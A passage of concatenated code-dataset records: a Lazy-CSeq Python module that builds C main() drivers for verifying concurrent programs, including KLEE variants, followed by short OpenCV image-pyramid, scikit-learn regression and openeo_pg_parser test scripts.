== 'main': continue\n            if i <= self.__threadbound:\n                main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n                main +=\" unsigned int __cs_tmp_t%s_r0;\\n\" % (i)\n                # main +=\" __CSEQ_assume(__cs_tmp_t%s_r0 >= 0);\\n\" % (i)\n                main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n                self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1   # Register to bitwidth parameter\n                main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n                main +=\" __cs_pc_cs = __cs_tmp_t%s_r0;\\n\" % (i)\n                main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n                main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n                main +=\" __cs_last_thread = %s;\\n\" % (i)\n                main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n                main +=\" }\\n\\n\"\n                i += 1\n\n        ''' Other rounds\n        '''\n        for round in range(1, ROUNDS):\n            main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n            # For main thread\n            main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n            main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n            main +=\" unsigned int __cs_tmp_t0_r%s;\\n\" % (round)\n            # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (round)\n            main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n            self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1   # Register to bitwidth parameter\n            main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n            if self.__guess_cs_only:\n                main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (round)\n            else:\n                main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n                main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n            main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n            main +=\" main_thread();\\n\"\n            main +=\" __cs_last_thread = 0;\\n\"\n            main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n            main +=\" }\\n\\n\"\n            main +=\"\\n\"\n            # For other threads\n            i = 1\n            for t in self.__threadName:\n                if t == 'main': continue\n                if i <= self.__threadbound:\n                    main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n                    main +=\" 
__CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n                    main +=\" unsigned int __cs_tmp_t%s_r%s;\\n\" % (i, round)\n                    # main +=\" __CSEQ_assume(__cs_tmp_t%s_r%s >= 0);\\n\" % (i, round)\n                    main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n                    self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1   # Register to bitwidth parameter\n                    main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n                    if self.__guess_cs_only:\n                        main +=\" __cs_pc_cs = __cs_tmp_t%s_r%s;\\n\" % (i, round)\n                    else:\n                        main +=\" __cs_pc_cs = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n                        main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[%s]);\\n\" % (i)\n                    main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines[t])\n                    main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n                    main +=\" __cs_last_thread = %s;\\n\" % (i)\n                    main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n                    main +=\" }\\n\\n\"\n                    i += 1\n\n\n        ''' Last call to main\n        '''\n\n        # For the last call to the main thread\n        # k = int(math.floor(math.log(self.__lines['main'],2)))+1\n        main += \" unsigned int __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n        self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n        # main +=\" __CSEQ_assume(__cs_tmp_t0_r%s >= 0);\\n\" % (ROUNDS)\n        main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n        if self.__guess_cs_only:\n            main +=\" __cs_pc_cs = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n        else:\n            main +=\" __cs_pc_cs = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n            main +=\" __CSEQ_assume(__cs_pc_cs >= __cs_pc[0]);\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" }\\n\"\n        main += \" return 0;\\n\"\n        main += \"}\\n\\n\"\n\n        return main\n\n    def __createMainRoundRobin(self, ROUNDS):\n        ''' New main driver:\n        '''\n        main = ''\n        main += \"int main(void) {\\n\"\n\n        ''' Part I:\n            Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n        '''\n        for r in range(0, ROUNDS):\n            for t in range(0,self.__threadbound+1):\n                threadsize = self.__lines[self.__threadName[t]]\n                k = int(math.floor(math.log(threadsize,2)))+1\n                self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n        ''' First round (round 0)\n        '''\n        round = 0\n        # Main thread\n        main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n        main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n        main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n        main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r0;\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs[0] > 0);\\n\"\n        main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n        main +=\" main_thread();\\n\"\n        main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n        main +=\"\\n\"\n        # Other threads\n        i = 1\n        for t in self.__threadName:\n            if t == 'main': continue\n            if i <= self.__threadbound:\n                main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n                main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n                main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n                main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r0;\\n\" % (i, i)\n                main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n                main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n                main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n                main +=\" }\\n\\n\"\n                i += 1\n\n        ''' Other rounds\n        '''\n        for round in range(1, ROUNDS):\n            main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n            # For main thread\n            main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n            main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n            
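# every still-active thread is re-scheduled once per round, resuming from the\n            # context-switch point stored at the end of its previous round\n            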
main +=\" if (__cs_active_thread[0]) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs[%s] = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] >= __cs_pc[%s]);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMain(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' Part I:\n Pre-guessed jump lengths have a size in bits depending on the size of the thread.\n '''\n for r in range(0, ROUNDS):\n for t in range(0,self.__threadbound+1):\n threadsize = self.__lines[self.__threadName[t]]\n k = int(math.floor(math.log(threadsize,2)))+1\n self._bitwidth['main','__cs_tmp_t%s_r%s' % (t,r)] = k\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" unsigned int __cs_tmp_t0_r0 %s;\\n\" % self.__extra_nondet\n main +=\" __CSEQ_assume(__cs_tmp_t0_r0 > 0);\\n\"\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r0;\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" unsigned int __cs_tmp_t%s_r0 %s;\\n\" % (i, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t%s_r0 = (__cs_tmp_t%s_r0 && (__cs_active_thread[%s] == 1));\\n\" % (i, i, i)\n self._bitwidth['main','__cs_run_t%s_r0' % (i)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r0) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r0;\\n\" % (i, 
i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __CSEQ_assume(__cs_last_thread != 0);\\n\"\n main +=\" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (round, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t0_r%s = (__cs_tmp_t0_r%s && (__cs_active_thread[0] == 1));\\n\" % (round, round)\n self._bitwidth['main','__cs_run_t0_r%s' % (round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t0_r%s) {\\n\" % (round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (round)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (round)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" __cs_last_thread = 0;\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" __CSEQ_assume(__cs_last_thread != %s);\\n\" % (i)\n main +=\" unsigned int __cs_tmp_t%s_r%s %s;\\n\" % (i, round, self.__extra_nondet)\n main +=\" unsigned int __cs_run_t%s_r%s = (__cs_tmp_t%s_r%s && (__cs_active_thread[%s] == 1));\\n\" % (i, round, i, round, i)\n self._bitwidth['main','__cs_run_t%s_r%s' % (i, round)] = 1 # Register to bitwidth parameter\n main +=\" if (__cs_run_t%s_r%s) {\\n\" % (i, round)\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[%s] = __cs_tmp_t%s_r%s;\\n\" % (i, i, round)\n else:\n main +=\" __cs_pc_cs[%s] = __cs_pc[%s] + __cs_tmp_t%s_r%s;\\n\" % (i, i, i, round)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] >= __cs_pc[%s]);\\n\" % (i, i)\n main +=\" __CSEQ_assume(__cs_pc_cs[%s] <= %s);\\n\" % (i, self.__lines[t])\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_last_thread = %s;\\n\" % (i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n k = int(math.floor(math.log(self.__lines['main'],2)))+1\n main += \" unsigned int __cs_tmp_t0_r%s %s;\\n\" % (ROUNDS, self.__extra_nondet)\n self._bitwidth['main','__cs_tmp_t0_r%s' % (ROUNDS)] = k\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n if self.__guess_cs_only:\n main +=\" __cs_pc_cs[0] = __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n else:\n main +=\" __cs_pc_cs[0] = __cs_pc[0] + __cs_tmp_t0_r%s;\\n\" % (ROUNDS)\n main +=\" __CSEQ_assume(__cs_pc_cs[0] >= __cs_pc[0]);\\n\"\n main +=\" __CSEQ_assume(__cs_pc_cs[0] <= %s);\\n\" % (self.__lines['main'])\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n 
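# The main() drivers below target KLEE: context-switch points are drawn directly\n    # from klee_range(lo, hi, name) instead of nondet values constrained via __CSEQ_assume().\n    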
#######################################################################################################\n #######################################################################################################\n #######################################################################################################\n #######################################################################################################\n def __createMainKLEERoundRobinDecomposePC(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(1, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = klee_range(0, %s, \\\"__cs_pc_cs_%s\\\");\\n\" % (i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(__cs_pc_0, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc_0 = __cs_pc_cs_0;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs_%s = klee_range(__cs_pc_%s, %s, \\\"__cs_pc_cs_%s\\\");\\n\" % (i, i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc_%s = __cs_pc_cs_%s;\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs_0 = klee_range(__cs_pc_0, %s, \\\"__cs_pc_cs_0\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainKLEERoundRobinOnePCCS(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs = klee_range(1, %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs = klee_range(0, %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines[t] + 1)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, 
i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs;\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs = klee_range(__cs_pc[%s], %s, \\\"__cs_pc_cs\\\");\\n\" % (i, self.__lines[t] + 1)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs;\\n\" % (i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" }\\n\"\n main += \" return 0;\\n\"\n main += \"}\\n\\n\"\n\n return main\n\n def __createMainKLEERoundRobin(self, ROUNDS):\n ''' New main driver:\n '''\n main = ''\n main += \"int main(void) {\\n\"\n\n ''' First round (round 0)\n '''\n round = 0\n # Main thread\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(1, %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\"\\n\"\n # Other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = klee_range(0, %s, \\\"__cs_pc_cs[%s]\\\");\\n\" % (i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n ''' Other rounds\n '''\n for round in range(1, ROUNDS):\n main +=\"__CSEQ_rawline(\\\"/* round %s */\\\");\\n\" % round\n # For main thread\n main +=\"__CSEQ_rawline(\\\" /* main */\\\");\\n\"\n main +=\" if (__cs_active_thread[0]) {\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" main_thread();\\n\"\n main +=\" __cs_pc[0] = __cs_pc_cs[0];\\n\"\n main +=\" }\\n\\n\"\n main +=\"\\n\"\n # For other threads\n i = 1\n for t in self.__threadName:\n if t == 'main': continue\n if i <= self.__threadbound:\n main +=\"__CSEQ_rawline(\\\" /* %s */\\\");\\n\" % t\n main +=\" if (__cs_active_thread[%s]) {\\n\" % (i)\n main +=\" __cs_pc_cs[%s] = klee_range(__cs_pc[%s], %s, \\\"__cs_pc_cs[%s]\\\");\\n\" % (i, i, self.__lines[t] + 1, i)\n main +=\" %s(__cs_threadargs[%s]);\\n\" % (t, i)\n main +=\" __cs_pc[%s] = __cs_pc_cs[%s];\\n\" % (i, i)\n main +=\" }\\n\\n\"\n i += 1\n\n\n ''' Last called to main\n '''\n\n # For the last call to main thread\n main +=\" if (__cs_active_thread[0] == 1) {\\n\"\n main +=\" __cs_pc_cs[0] = klee_range(__cs_pc[0], %s, \\\"__cs_pc_cs[0]\\\");\\n\" % (self.__lines['main'] + 1)\n main +=\" 
main_thread();\\n\"\n        main +=\" }\\n\"\n        main += \" return 0;\\n\"\n        main += \"}\\n\\n\"\n\n        return main\n\n\n    # Checks whether variable v from function f is a pointer.\n    #\n    def __isPointer(self, f, v):\n        if self.__donotcheckpointer: return False\n        if v in self.Parser.varNames[f] and self.Parser.varType[f,v].endswith('*'): return True\n        elif v in self.Parser.varNames[''] and self.Parser.varType['',v].endswith('*'): return True\n        else: return False\n\n\n    # Checks whether variable v from function f is global.\n    #\n    def __isGlobal(self, f, v):\n        if (v in self.Parser.varNames[''] and v not in self.Parser.varNames[f]): return True\n        else: return False\n\n\n    # Check whether the given AST node accesses global memory or uses a pointer.\n    #\n    # TODO: this overapproximation is very rough;\n    # variable dependency, pointer analysis, etc.\n    # could be useful for refinement.\n    #\n    def __globalAccess(self, stmt):\n        if self.__atomic: return False   # between atomic_begin() and atomic_end() calls no context switches are needed\n\n        oldStmtCount = self.__stmtCount   # backup counters\n        oldMaxInCompound = self.__maxInCompound\n        oldGlobalMemoryAccessed = self.__globalMemoryAccessed\n\n        globalAccess = False\n        self.__globalMemoryAccessed = False\n\n        if type(stmt) not in (pycparser.c_ast.If, ):\n            tmp = self._generate_stmt(stmt)\n        else:\n            tmp = self._generate_stmt(stmt.cond)\n\n        globalAccess = self.__globalMemoryAccessed\n\n        self.__stmtCount = oldStmtCount   # restore counters\n        self.__maxInCompound = oldMaxInCompound\n        self.__globalMemoryAccessed = oldGlobalMemoryAccessed\n\n        return globalAccess\n\n","sub_path":"examples/litmus/c/lazy-cseq-2.0/modules/lazyseqnewschedule.py","file_name":"lazyseqnewschedule.py","file_ext":"py","file_size_in_byte":79767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"920568","text":"import cv2\n\n# raw string so the backslashes in the Windows path are not treated as escapes\nimg_path = r'F:\\OpenCVDataSet\\misc\\lena_color_256.tif'\nimg = cv2.imread(img_path)\ncv2.imshow('Lena', img)\n\n'''\nIMAGE PYRAMID EX:\n'''\n# pyrDown/pyrUp halve/double each image dimension (with Gaussian smoothing)\nsmaller = cv2.pyrDown(img)\nlarger = cv2.pyrUp(img)\ncv2.imshow('Smaller', smaller)\ncv2.imshow('Larger', larger)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"openCV_basic_concept/image-pyramid.py","file_name":"image-pyramid.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"408964984","text":"import pandas\nfrom sklearn import linear_model\n\n\n# read the csv file using pandas (pd.read_csv works the same if pandas is imported as pd)\ndataset = pandas.read_csv(\"dataset_3_outputs.csv\")\n# assign everything to a variable called 'dataset'; it will contain everything inside the file\n\n#print(dataset)\n\n# read the first column\n# 0 - column 0\n# ':' targets the whole column\n# [0,0] is for column 0 and row 0, which locates a single number; to reveal it you don't need \".values\" (it is already a scalar, not a 1-d array)\ntarget = dataset.iloc[:,0].values\ntarget1 = dataset.iloc[0,0]\n\ndata = dataset.iloc[:,3:9].values\n# 6 columns (features)\n\n#print(data)\n\nmachine = linear_model.LinearRegression()\n# set up the linear regression model\nmachine.fit(data, target)\n\nprint(machine)\n\n# same columns as the training data\nnew_data = [\n\t[0.01, -0.2, 0.5, 1.1, 0, 0],   # 1st object\n\t[-0.5, -0.1, 0.44, -0.9, 1, 0.5]   # 2nd object\n]\n\nnew_target = machine.predict(new_data)\n\nprint(new_target)\n\n\n","sub_path":"run_regression.py","file_name":"run_regression.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"27281952","text":"import os\nimport unittest\nfrom openeo_pg_parser.translate import translate_process_graph\n\n\nclass TranslateTester(unittest.TestCase):\n    \"\"\" Testing the module `translate` for different process graph translations. \"\"\"\n\n    def setUp(self):\n        \"\"\" Setting up variables for one test. \"\"\"\n        self.pg_dirpath = os.path.join(os.path.dirname(__file__), 'process_graphs')\n        self.uc1_polarization_pg_filepath = os.path.join(self.pg_dirpath, \"s1_uc1_polarization.json\")\n        self.non_existing_filepath = os.path.join(self.pg_dirpath, \"does_not_exist.json\")\n\n    def test_translate_process_graph(self):\n        \"\"\" Translates a process graph from openEO syntax to a Python traversable object. \"\"\"\n\n        graph = translate_process_graph(self.uc1_polarization_pg_filepath)\n        print(graph)\n        assert True\n\n    def test_process_graph_not_found(self):\n        \"\"\" Checks if an error is thrown when a process graph file cannot be found. \"\"\"\n\n        try:\n            translate_process_graph(self.non_existing_filepath)\n            self.fail(\"expected a FileNotFoundError\")\n        except FileNotFoundError:\n            pass\n\n    def test_from_global_parameter(self):\n        \"\"\" Tests parsing of a globally defined parameter. \"\"\"\n        global_parameter_filepath = os.path.join(self.pg_dirpath, \"s2_max_ndvi_global_parameter.json\")\n        parameters = {'test_from_parameter': 3}\n        graph = translate_process_graph(global_parameter_filepath, parameters=parameters)\n\n        assert graph['ndvi_6'].arguments['y'] == 3\n\n    def test_from_local_parameter(self):\n        \"\"\" Tests parsing of a locally defined parameter. 
